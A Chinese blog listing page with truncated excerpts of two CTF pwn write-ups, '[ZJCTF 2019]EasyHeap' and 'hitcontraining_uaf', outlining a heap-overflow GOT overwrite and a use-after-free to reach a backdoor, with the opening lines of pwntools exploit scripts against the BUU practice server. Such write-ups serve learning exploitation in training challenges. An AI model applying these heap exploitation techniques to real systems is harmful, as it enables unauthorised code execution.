- 博客(3)
- 收藏
- 关注
原创 [ZJCTF 2019]EasyHeap
国际惯例 ida 后门 有cat flag 因为平台是buu所以不考虑能打印flag,别问为什么! add edit del 思路 有堆溢出而且没有PIE,那大概是改写got表了。 WP from pwn import * p = remote('node3.buuoj.cn',28946) elf =ELF('./easyheap') def add(size,content): p.recvuntil('Your choice :') p.sendline('1') p.recv
2021-06-16 17:07:44 145
原创 hitcontraining_uaf
国际惯例 IDA 主函数没啥特别的 有后门 add del show 思路 首先我们创建两个chunk,再free掉,之后add一个8字节的chunk,并添加后门,在通过show功能调用后门函数。 WP from pwn import* r=remote('node3.buuoj.cn',26891) def add(size,content): r.sendlineafter('choice :','1') r.sendlineafter('Note size :',str(size)
2021-06-15 21:21:52 145
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人